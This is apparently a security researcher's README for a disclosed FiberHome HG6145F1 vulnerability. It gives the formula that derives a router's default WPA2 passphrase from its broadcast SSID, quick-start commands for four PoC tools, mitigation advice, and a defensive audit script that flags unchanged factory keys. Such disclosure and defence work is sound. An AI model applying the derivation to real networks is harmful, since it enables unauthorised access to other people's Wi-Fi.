# CVE-2025-63353 PoC - FiberHome HG6145F1 Predictable Default Wi-Fi PSK
## Summary
The factory default Wi-Fi pre-shared key on affected FiberHome HG6145F1 devices is a deterministic function of the broadcast SSID. An attacker observing a beacon frame from a vulnerable device can derive the WPA2 PSK in constant time with no captured handshake, no wordlist, no GPU, and no client interaction.
For a device broadcasting SSID `fh_<hex_a>`, where `hex_a` is the hexadecimal suffix of the SSID, the default PSK is:

```
PSK = "wlan" + hex(0xFFFFFF XOR hex_a)
```
**Example:** `fh_a1f9d1` → `wlan5e062e`
The effective per-device keyspace is **1**. The population-wide keyspace across all HG6145F1 deployments is at most **2²⁴ ≈ 16.7 million** (SSID, PSK) pairs. Because the SSID is broadcast and the SSID-to-PSK mapping is one-to-one, an observer knows which pair applies to a given device.
## Repository contents
```text
.
├── README.md
├── LICENSE
├── docs/
│   ├── vulnerability.md          Technical analysis of the algorithm
│   ├── timeline.md               Disclosure chronology and vendor response
│   ├── affected-deployments.md   Device specifications and known deployments
│   ├── related-research.md       Lineage of predictable-PSK vulnerabilities
│   ├── references.md             Curated bibliography
│   └── mitigation.md             Guidance for users, ISPs, and vendors
└── poc/
    ├── python/                   pure-Python implementation, no dependencies
    ├── go/                       standalone Go binary
    ├── javascript/               browser-friendly JS / Node.js
    └── c/                        portable single-file ANSI C (compiles anywhere)
```
## Quick start
```bash
# Python
python3 poc/python/fh-poc.py fh_a1f9d1
# wlan5e062e

# Go
cd poc/go && go run fh-poc.go fh_a1f9d1
# wlan5e062e

# JavaScript (Node)
node poc/javascript/fh-poc.js fh_a1f9d1
# wlan5e062e

# C
cc poc/c/fh-poc.c -o fh-poc && ./fh-poc fh_a1f9d1
# wlan5e062e
```
All four implementations are independently written, dependency-free, and produce identical output. Use whichever matches your environment.
## Affected devices
| Field | Value |
|---|---|
| Vendor | FiberHome (Wuhan FiberHome International Technologies) |
| Model | HG6145F1 |
| Firmware | RP4423 |
| Device type | GPON ONT, Wi-Fi 6 (802.11ax), dual-band 2.4/5 GHz |
| Standards | ITU-T G.984 Class B+, IEEE 802.11 a/b/g/n/ac/ax |
The vulnerability is currently disclosed for the HG6145F1 RP4423 firmware only. Verification across the broader HG6145 / HG6243 / HG6821 model family is an open research question. See [docs/affected-deployments.md](docs/affected-deployments.md).
## Mitigation
**For end users of an HG6145F1:**
1. Change the default Wi-Fi PSK to a randomly generated 16+ character passphrase immediately.
2. Disable WPS.
3. If your ISP controls firmware updates, ask whether a patched firmware is available.
See [docs/mitigation.md](docs/mitigation.md) for guidance specific to ISPs and vendors.
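A defender-side check built on the derivation in the Summary, as an added example that is not part of this repository's PoC code: it audits an inventory of (device, SSID, PSK) records for devices still on the factory passphrase and generates a replacement as in mitigation step 1. The record layout, device IDs, status names, and the fixed six-hex-digit, zero-padded format are assumptions.

```python
import hmac
import re
import secrets
import string

# Assumption: the SSID suffix is exactly six hex digits (24 bits), as in the
# README's example fh_a1f9d1 and its 0xFFFFFF mask.
SSID_RE = re.compile(r"fh_([0-9a-fA-F]{6})")
FACTORY_SHAPE_RE = re.compile(r"wlan[0-9a-f]{6}")

def factory_psk(ssid):
    """Factory PSK implied by an fh_ SSID, or None if the SSID is not in that form."""
    m = SSID_RE.fullmatch(ssid)
    if m is None:
        return None
    # Assumption: lowercase, zero-padded to six digits, matching wlan5e062e.
    return "wlan%06x" % (int(m.group(1), 16) ^ 0xFFFFFF)

def classify(ssid, configured_psk):
    """Return 'factory-default', 'factory-shaped' or 'rotated' for one device."""
    expected = factory_psk(ssid)
    if expected and hmac.compare_digest(expected.encode(), configured_psk.encode()):
        return "factory-default"   # PSK follows directly from the broadcast SSID
    if FACTORY_SHAPE_RE.fullmatch(configured_psk):
        return "factory-shaped"    # wlan + 6 hex digits, but not derived from this SSID
    return "rotated"

def new_passphrase(length=20):
    """Random replacement passphrase (mitigation step 1 asks for 16+ characters)."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

def audit(records):
    """records: (device_id, ssid, psk) tuples. Returns {device_id: status} needing rotation."""
    results = {dev: classify(ssid, psk) for dev, ssid, psk in records}
    return {dev: status for dev, status in results.items() if status != "rotated"}

# Constructed inventory rows (hypothetical device IDs and passphrases).
SAMPLE = [
    ("ont-001", "fh_a1f9d1", "wlan5e062e"),
    ("ont-002", "fh_a1f9d1", "Tq7mLx2VbN9cRw4KpZ8d"),
    ("ont-003", "HomeNet", "wlan0b33c7"),
]

if __name__ == "__main__":
    for dev, status in audit(SAMPLE).items():
        print(dev, status, "->", new_passphrase())
```

The `factory-shaped` status covers devices whose SSID was renamed while the passphrase kept the factory format, which still falls inside the 2²⁴ population-wide keyspace described in the Summary.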
## Disclaimer
This repository is published **for educational and defensive security research purposes only**. The vulnerability documented here is publicly disclosed under CVE-2025-63353 and has been assigned a critical severity rating by CISA-ADP.
Use of the code in this repository against networks you do not own or do not have explicit written authorization to test is **illegal** in most jurisdictions, including under Moroccan Law 07-03 on cybercrime, the EU Computer Misuse frameworks, the US Computer Fraud and Abuse Act, and equivalent legislation elsewhere. The authors accept no responsibility for unauthorized use of this material.
## References
A complete bibliography of primary sources, related vulnerabilities, and academic literature is maintained in [docs/references.md](docs/references.md).
## Author
**Ayman Wadi** — Security Engineer